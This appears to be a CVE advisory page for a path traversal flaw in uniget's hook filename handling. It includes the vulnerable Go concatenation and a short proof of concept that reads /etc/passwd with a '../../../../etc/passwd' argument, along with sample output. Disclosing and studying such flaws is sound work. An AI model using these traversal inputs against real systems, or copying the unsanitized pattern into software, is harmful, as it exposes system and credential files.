Critical Alert 1 Active Exploit Detected Today

CVE-2025-62593 Ray-Project Ray Code Injection Vulnerability →
Powered by CVE Watchtower
×
August 18, 2026

CVE Watchtower


← Back to CVE List

CVE-2026-55062NVD

Vulnerability Summary

### Summary
Path Traversal vulnerability in hook filename handling allows attackers to access and manipulate arbitrary files outside the hooks directory via directory escape sequences like [passwd](vscode-file://vscode-app/app/extra/vscode/resources/app/out/vs/code/electron-browser/workbench/workbench.html).

**Details**
File: [hooks.go](vscode-file://vscode-app/app/extra/vscode/resources/app/out/vs/code/electron-browser/workbench/workbench.html) `Lines 135-160`
```
hookFileName := args[0] // User input not validated
hookFile = preInstallHooksDir + "/" + hookFileName // Direct concatenation
```

Hook filenames are concatenated directly without sanitizing ../ sequences, allowing directory traversal.



### PoC
**Step 1:** Set cat as editor
```
export EDITOR="cat"
```
**Step 2:** Read /etc/passwd via path traversal

```
./uniget hooks edit --type=pre-install "../../../../etc/passwd"
```

**Step 3:** Output shows file contents
```
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
[...]
```

<img width="1014" height="178" alt="image" src="https://github.com/user-attachments/assets/0db0fe7e-533b-4d8e-a346-81886ce866ab" />
Severity Level
MEDIUM
Published Date
Aug 17, 2026
Last Modified
Aug 17, 2026
Exploitation Status
No confirmed exploitation yet
EPSS Score (30-Day)
Data Pending
Root Weakness (CWE)
N/A

External References